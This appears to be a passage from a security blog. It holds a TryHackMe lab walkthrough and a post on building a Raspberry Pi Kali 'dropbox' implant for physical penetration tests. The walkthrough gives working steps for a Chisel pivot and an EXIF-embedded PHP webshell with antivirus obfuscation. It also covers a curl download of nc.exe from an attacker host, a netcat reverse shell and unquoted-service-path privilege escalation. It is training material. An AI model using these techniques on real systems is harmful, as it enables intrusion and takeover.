TryHackMe recommends making use of Chisel and their Forward Proxy service. The only real requirement before connecting to the Personal Computer is setting up a firewall rule on the GitServer:

netsh advfirewall firewall add rule name="Chisel-FP" dir=in action=allow protocol=tcp localport=16000

I’ve chosen port 16000 here as the port that we will connect through to get connected to the Personal Computers website. Then we can upload the chisel executable to the GitServer and run it using the port configured before:

.\chisel.exe server -p 16000 --socks5

Now were half way there to having this connection open. We need to connect from our attacking machine (Kali) to this chisel server. We do this by using chisel to connect to the GitServer:

.\chisel client 10.200.90.150:16000 9090:socks

Finally, if we set up a proxy on our browser using something like FoxyProxy to go via port 9090 on a SOCKS5 connection we can then browse the website using: HTTP://127.0.0.1:9090.

Git Goodness

By now we’ve taken a look at the site hosted on the personal computer and identified that it’s a carbon copy of the original site we saw on the web server. Looking at the GitServer however, we can see there is a repository on it in the directory: C:\GitServer\repositories\Website.git. We can download this git file and use a tool to extract its content.

First clone the tool on your attacking machine:

git clone https://github.com/internetwache/GitTools

Next use the extractor.sh file extract all of the contents from the Website.git file to a new folder, I’ve called my DevelopmentServer:

./extractor.sh ./website.git DevelopmentServer

Now we can run a quick bash one liner to identify the latest version of the site:

separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"

This looks at the commit-meta.txt file in each folder extracted in the DevelopmentServer folder and outputs the information. From here we can see there are three main IDs:

  1. 70dde80cc19ec76704567996738894828f4ee895
  2. 82dfc97bec0d7582d485d9031c09abcb5c6b18f2
  3. 345ac8b236064b431fa43f53d91c98c4834ef8f3

If you look closely at the output you can see two of these have parent IDs against them making them not the root commit but a child one. As a result, we can rule out the one without a parent as that was the first upload of the website. Then if we find the ID with the parent ID of the original website we can rule that out as the second update, leaving the third and final commit as the latest edition of the website. In this case, the 3rd ID in the list above is the latest.

From here we can try and find if there’s a vulnerability in the site we can take advantage of. As we know the site uses PHP as before we can search for PHP files in that directory using the find command:

find . -name "\*.php"

The result is a single file called index.php, there are some interesting comments on things that need to be sorted, one of the main ones being that the resources folder is protected by basic auth. Here is where human habits come in, we cracked Thomas’ password in a previous step, let’s see if he is using it here, go to the website HTTP://127.0.0.1:9090/resources and login with Thomas and the password from the NTLM hash taken using mimikatz. Once being the auth we can see that it’s an upload function, however, there are some filters in place which we should have identified in the index.php file:

$size = getimagesize($_FILES["file"]["tmp_name"]);
if(!in_array(explode(".", $_FILES["file"]["name"])[1], $goodExts) || !$size){
    header("location: ./?msg=Fail");
    die();
}

This filter checks for the size of the image through EXIF data to ensure that it is an image using the getimagesize function. The final part of the function checks if the file has the correct extension. The second part to bypass is easy as it’s hard coded to explode out the filename using . as the delimiter and only returning the number 1 array item. To get around this we can simply upload a file called image.jpg.php. The explode function takes image as array item 0, jpg as array item 1 and PHP as array item 2.

Exploit

OK, so we know what we’re working with, time to exploit it. To do this we can use exiftool to create a PoC. Download an image and run exiftool to add a PHP comment:

exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" example.jpeg

What we have done here is implement some PHP code in the comment of the EXIF data which just outputs a piece of HTML on the screen. Next we add the PHP extension to the file and upload it through the website:

mv example.jpeg example.jpeg.php

If we now go to the resources uploads folder we should be able to run the file and see if we get the expected output:

HTTP://127.0.0.1:9090/resources/uploads/example.jpeg.php

We do, this is awesome, now we have the ability to run code remotely. Before we can upload a file to run a remote shell we need to review what we were told about this computer: There is a PC running on the network that has an antivirus installed, meaning we can hazard a guess that this is likely to be Windows. OK so we need to run some obfuscation to get past the antivirus. First let’s create the payload:

<?php
    $cmd = $_GET["awesomecommand"];
    if(isset($cmd)){
        echo "<pre>" . shell_exec($cmd) . "</pre>";
    }
    die();
?>

Time to obfuscate it, go to the following website and select every option for obfuscation and click Obfuscate Source Code: https://www.gaijin.at/en/tools/php-obfuscator

Now the uploader won’t like you uploading the same filename, this was shown in the PHP source code from the Git repository however, we can run exiftools again to input the new comment with the new obfuscated source code, change the filename with the mv command and upload it. When you go to the new web page you will hopefully be presented with an error of “Undefined Index”, if you do you’ve done it. The reason why is because the exploit code is expecting a URL parameter of awesomecommand so if go to the following web address we should get back the response of the shell command whoami:

HTTP://127.0.0.1:9090/resources/uploads/example1.jpeg.php?awesomecommand=whoami

Brilliant, now we have a foothold, let’s get a full shell. To do this, download a statically compiled version of netcat, you can get one from here:

git clone https://github.com/int0x33/nc.exe/

Next, we can set up an HTTP server (python3 -m http.server 80) on our attacking machine and use cURL to download the nc.exe to a location of our choosing. The room says to use the temp folder within Windows, however, I had trouble with that, a much safer and more guaranteed option is to use the tasks folders as that’s world writable:

HTTP://127.0.0.1:9090/resources/uploads/example1.jpeg.php?awesomecommand=curl http://10.50.91.232/nc.exe -o c:\windows\tasks\nc-USERNAME.exe

The connection should get established and the nc.exe file will be downloaded to the windows\tasks folder. Right almost, there we have the means to get a shell, let’s run it, on our attacker machine setup a netcat listener: nc -lvnp 4444

Now run a PowerShell command to run the newly downloaded netcat executable to connect to our attacking machine:

HTTP://127.0.0.1:9090/resources/uploads/example1.jpeg.php?awesomecommand=powershell.exe c:\windows\temp\nc-USERNAME.exe 10.50.91.232 4444 -e cmd.exe

Mileage may vary here and the port may need to be changed, if you don’t get a connection, use one of the well-known ports, 80, 443 etc.

Privilege Escalation

What a journey, now the final piece get root/administrator on this Personal Computer. The first thing here is to enumerate the system to see what we can exploit to get full rights. Follow the room here as there are some cool commands that can be run to get a better understanding of what’s available. Here I will just use this command which is important:

wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"

This command searches for all non-windows services. One of them has a PathName which isn’t in quotation marks, we then use this command to check if it runs under a local admin account:

sc qc SERVICE_NAME

The final part of the enumeration is to check if we have rights to the folder for and exploit:

powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"

The enumeration is now done, we have a service which hasn’t been quoted and as spaces in it and is run as an admin as well as permission to write in the folder where the service resides. The way this works is because the service isn’t in quotation marks it runs through each word looking for the file in that folder, here is an example pulled from the room:

C:\Directory.exe
C:\Directory One\Directory.exe
C:\Directory One\Directory Two\Executable.exe

So, let’s write some code on our attacker machine to get a new reverse netcat connection but under the service which is the administrator. You can follow the room here as it’s exactly what I did, the end result is you have a wrapper.cs file (c sharp) which we can then compile into an executable:

mcs wrapper.cs

It’s good to follow the room here for getting the new wrapper.exe file onto the Personal Computer as it showcases an alternative method for copying files around, however, for this blog we will just use a simple HTTP server: python3 -m http.server 80

Again like before I uploaded this to the tasks folder using cURL rather than the temp folder. Finally now that we have got it uploaded we need to move the new file into a location before where the service is and restart the service:

copy c:\windows\tasks\wrapper.exe "C:\Program Files (x86)\System Explorer\System.exe" 
sc stop SystemExplorerHelpService 
sc start SystemExplorerHelpService

Before you start the service, set up a netcat listener on the port you specified in your wrapper. The service will not start correctly as it’s loading our file but we do get a reverse shell and we’re on as an administrator. SUCCESS, we’ve done it, got control of the entire network.

Takeaways

There’s been a lot of learning in this room but there have been some topics that have really been beneficial for me.

Pivoting

Whilst I had knowledge of this technique and used it when completing my eJPT exam I didn’t have a great understanding of it and how best to use it. Going through different applications that can be used for this has been great and has given me a better understanding of what to use and when.

Command & Control (Empire & Starkiller)

What to say about this, I’m a huge Star Wars nerd so just the names are truly awesome. However, I built a Command and Control system through the book Black Hat Python (explained here: https://random-it-stuff.com/2022/01/05/cyber-security-red-teaming-path/) and whilst I know it works and my system runs off GitHub as per the book I didn’t appreciate exactly how I could build out my system. Now I’ve had some time with Empire/Starkiller I have gained some new ideas on how to make my system better.

Categories
Coding Computers Hacking Linux Networks

Kali Dropbox

#Please note any links in this article are affiliate links. You will not be charged extra if you use these links however, I will get some kickback if you do so thank you.

As part of performing a Penetration Test, it is often good practice to try and get a device on the internal network, especially if performing a physical test. There are loads of ways of doing this with guides available from YouTube and other blog sites but I thought I would write up how I’ve done it in case, someone comes across this page and is intrigued. This should be pretty straightforward now as I’ve spent quite some time writing custom scripts to create reverse connections and other things to then realise you can just use a VPN connection.

So to the hardware then; here is a kit list of everything that I’ve got:

*Not strictly necessary but it does mean you can connect to a network if it’s PoE capable without the need for a Power supply

First things first, don’t be the idiot that I was and try and install the Pi into the case with the Micro SD card installed. It’ll cost you £10 for a replacement!

So now that we have everything we need, let’s get Kali installed on the SD Card. This is pretty easy as Kali have an ARM variant of their operating system https://www.kali.org/get-kali/#kali-arm. Download the image specific for your device. To get the image onto your SD card there are a few options for imaging software the one I use is called Etcher by Balena: https://www.balena.io/etcher/. It’s really easy to use, however, I did get an error message when adding my Kali ARM image stating it couldn’t be written properly. I ignored it and installed the SD Card in the Pi and the works fine.

Next we need to decide on how we’re going to connect out to our command and control system. As mentioned above, I went off on a complete tangent with this and tried creating my own Python script to be able to connect out and open a reverse connection. In the end this wasn’t necessary at all. As every business has an internet connection and the main use of this is web browsing using an SSL VPN service is almost always going to be open. To make this work Kali has OpenVPN already installed so you just need to set up a service which your Dropbox can connect to. In my case we’ve already set up a VPN service to our office which is available on TCP/443. All I needed to do is download the OpenVPN config file from my VPN server set the connection request to TCP/443 (default is UDP/1194) and connect up.

We’ve now got a device that can connect up to a remote service from anywhere in the world providing we run that script. Let’s get this to run on boot. To do this we need to enable OpenVPN from boot using this command: systemctl enable OpenVPN

This starts the service on boot and by default looks for a config file in /etc/openvpn/openvpn.conf. Moving our config file and renaming it to openvpn.conf in that location will solve this riddle. Now on boot it automatically starts OpenVPN and connects up to our VPN service. This is great the final piece is to have some error checking, should the VPN go down for whatever reason we need something to attempt to re-establish the connection and/or test for any internet connectivity problems. To solve this we will use a Python script and a Cron Job which will run the script every 5 minutes.

import http.client, urllib
import socket
import ipaddress
import os
import time
from netifaces import AF_INET, AF_INET6, AF_LINK, AF_PACKET, AF_BRIDGE
import netifaces as ni

def CheckIPAddress():
   try:
       SocforIP = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
       SocforIP.connect(("IP of VPN Network", 80))
       vpnIP = SocforIP.getsockname()[0]
       if ipaddress.ip_address(vpnIP) in ipaddress.ip_network('Subnet of VPN Network'):
          VPNOn = CheckifVPNOperational()
          if VPNOn != None:
             return VPNOn
          return vpnIP
       else:
          return "1.1.1.1"
   except:
       return "1.1.1.1"

def CheckIfAddressDifferent(IpAddress):
    try:
        file = open("StoredIP.txt")
        line = file.readline()
        OriginalIP = line.split(",")[0]
        file.close
        if(OriginalIP != IpAddress):
            with open("StoredIP.txt", 'w') as OpenFile:
                OpenFile.truncate(0)
                OpenFile.write(str(IpAddress) + "," + str(time.time()))
                SendNotification("Tap Interface of the-box has change and is now: " + IpAddress)
    except:
        with open("StoredIP.txt", 'w') as file:
            file.write("new file opened")

def SendNotification(Message):
    PushoverConnection = http.client.HTTPSConnection("api.pushover.net:443")
    PushoverConnection.request("POST", "/1/messages.json",
        urllib.parse.urlencode({
            "token": "xxxxxx22222222",
            "user": "xxxxxxx33333333",
            "message": Message,
            "title": "Dropbox has connected to the VPN"
        }), {"Content-type": "application/x-www-form-urlencoded"})
    response = PushoverConnection.getresponse()

def CheckforInternetConnectivity():
    response = os.system("ping -c 1 8.8.8.8")
    if response == 0:
        os.system("systemctl restart openvpn")
        time.sleep(5)
        ipaddressfound = CheckIPAddress()
        if ipaddressfound == '1.1.1.1':
            True
    else:
        with open("StoredIP.txt", 'w') as file:
            file.truncate(0)
            file.write("There is no internet connectivity," + str(time.time()))

def CheckifVPNOperational():
    response = os.system("ifconfig tun0")
    try:
       if "Device not found" in response:
         os.system("systemctl restart openvpn")
    except Exception as e:
         tun0ip = ni.ifaddresses('tun0')[AF_INET][0]['addr']
         return tun0ip

if __name__ == '__main__':
    ipaddressfound = CheckIPAddress()
    if ipaddressfound != '1.1.1.1':
        CheckIfAddressDifferent(ipaddressfound)
    else:
        CheckforInternetConnectivity()

Finally to run a Cron Job every five minutes you need to set the timings as follows: */5 * * * python3 notification.py